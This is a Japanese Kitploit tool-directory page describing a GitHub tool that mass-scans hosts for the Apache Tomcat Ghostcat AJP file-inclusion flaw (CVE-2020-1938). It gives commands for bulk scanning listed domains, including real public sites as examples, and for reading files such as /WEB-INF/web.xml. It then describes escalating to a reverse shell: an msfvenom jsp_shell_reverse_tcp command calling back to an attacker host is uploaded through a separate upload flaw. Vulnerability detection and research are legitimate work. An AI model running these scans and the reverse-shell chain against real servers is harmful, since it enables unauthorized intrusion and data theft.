Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CNVD-2020-10487 — CVE-2020-1938 / CNVD-2020-1048 検出ツール | Kitploit
ツール/GitHubGitHub/doggycheng/cnvd-2020-10487
脆弱性スキャナーエクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubdoggycheng/cnvd-2020-10487

CNVD-2020-10487

CVE-2020-1938 / CNVD-2020-1048 検出ツール

リポジトリを見る
8616年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

説明

本ツールはセキュリティ研究および内部確認専用です。不正な攻撃に使用することは禁止されており、生じた結果は使用者が負うものとします。

Apache Tomcatファイルインクルード脆弱性(CVE-2020-1938 / CNVD-2020-1048)の一括検出ツール。

このプロジェクトはKit4yのプロジェクトをベースに修正を加えたものです。

コード修正

ip.txtにドメインまたはIPが1つしかない場合、threadCountが1になりプログラムが実際に実行されないため、スレッド数を判定するコードを追加しました。

root@kitploit:~
...
if threadCount == 1:
    threadCount = 2
for i in range(0,threadCount-1):
...
Python3互換のために少量のコードを修正しました。修正前のコード
root@kitploit:~
self.stream = self.socket.makefile("rb", bufsize=0)
root@kitploit:~
print("".join([d.data for d in data]))
修正後のコード
root@kitploit:~
if sys.version_info < (3, 0):
    self.stream = self.socket.makefile("rb", bufsize=0)
else:
    self.stream = self.socket.makefile("rb", buffering=None)
root@kitploit:~
if sys.version_info < (3, 0):
    print("".join([d.data for d in data]))
else:
    print(b"".join([d.data for d in data]).decode("UTF-8"))

使用方法

一括検出

1. スキャンするドメイン/IPをip.txtに配置します。例:

127.0.0.1 www.baidu.com www.google.com

2. python threading-find-port-8009.py

ip.txt内のドメイン/IPをスキャンして8009ポートが開放されているものを探し、生成された8009.txtに保存します。

3. python threading-CNVD-2020-10487-Tomcat-Ajp-lfi.py

8009.txtから脆弱性のあるURLをフィルタリングし、vul.txtに保存します。最終的にvul.txtに存在するドメインが脆弱性を含むドメインです。

単一サイト検出

python CNVD-2020-10487-Tomcat-Ajp-lfi.py target.com

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /WEB-INF/web.xml 192.168.125.128

python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128

ディレクトリ横断とリバースシェル

デフォルトではwebappsのROOTを読み取ります。“/asdf”を“/test/asdf”に変更することでwebapps下のtestディレクトリの内容にアクセスできます。

root@kitploit:~
t.perform_request('/asdf',attributes=[

サーバーにファイルアップロード脆弱性が同時に存在する場合、以下のshell.txtをアップロードします。

root@kitploit:~
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.125.130 LPORT=4444 > shell.txt

“/asdf”を“/asdf.jsp”に変更し、MSFを起動した後にPoCツールを使用してシェルを取得できます。

その他の関連ツール

https://github.com/0nise/CVE-2020-1938 https://github.com/hypn0s/AJPy https://github.com/00theway/Ghostcat-CNVD-2020-10487

ツールをダウンロード